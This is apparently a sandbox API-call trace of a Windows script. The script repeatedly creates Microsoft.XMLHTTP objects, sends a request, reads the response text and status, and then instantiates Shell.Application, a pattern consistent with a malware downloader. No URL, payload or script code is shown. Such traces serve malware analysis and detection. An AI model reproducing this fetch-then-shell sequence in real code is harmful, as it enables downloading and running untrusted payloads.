	[0604.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0604.077] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0604.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0604.079] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0604.079] SysStringLen (param_1=0x0) returned 0x0
	[0604.080] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0604.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0604.080] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0604.080] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0604.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0604.080] ??2@YAPEAX_K@Z () returned 0x62f330
	[0604.080] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f330) 
	[0604.080] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0604.080] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0604.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0604.080] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0604.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0604.080] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0604.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0604.081] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0604.081] SysStringLen (param_1=0x0) returned 0x0
	[0604.081] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0604.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0604.081] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0604.081] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0604.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0604.081] ??2@YAPEAX_K@Z () returned 0x62f310
	[0604.081] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0604.081] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0604.081] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0604.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0604.081] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0604.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0604.081] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0604.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0604.082] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0604.082] SysStringLen (param_1=0x0) returned 0x0
	[0604.082] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0604.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0604.082] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0604.082] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0604.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0604.082] ??2@YAPEAX_K@Z () returned 0x62f330
	[0604.082] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0604.082] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0604.082] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0604.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0604.082] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0604.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0604.083] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0604.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0604.083] longjmp () 
	[0604.083] longjmp () 
	[0604.083] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0604.083] SysStringLen (param_1=0x0) returned 0x0
	[0604.083] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0604.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0604.083] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0604.083] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0604.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0604.083] ??2@YAPEAX_K@Z () returned 0x62f310
	[0604.083] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0604.083] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0604.084] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0604.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0604.084] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0604.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0604.084] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0604.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0604.084] longjmp () 
	[0604.084] longjmp () 
	[0604.084] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0604.084] SysStringLen (param_1=0x0) returned 0x0
	[0604.084] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0604.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0604.085] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0604.085] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0604.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0604.085] ??2@YAPEAX_K@Z () returned 0x62f330
	[0604.085] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0604.085] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0604.085] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0604.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0604.085] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0604.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0604.085] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0604.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0604.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0604.085] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0604.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0607.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0607.740] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0607.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0607.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0607.740] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0607.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0607.741] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0607.741] SysStringLen (param_1=0x0) returned 0x0
	[0607.741] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
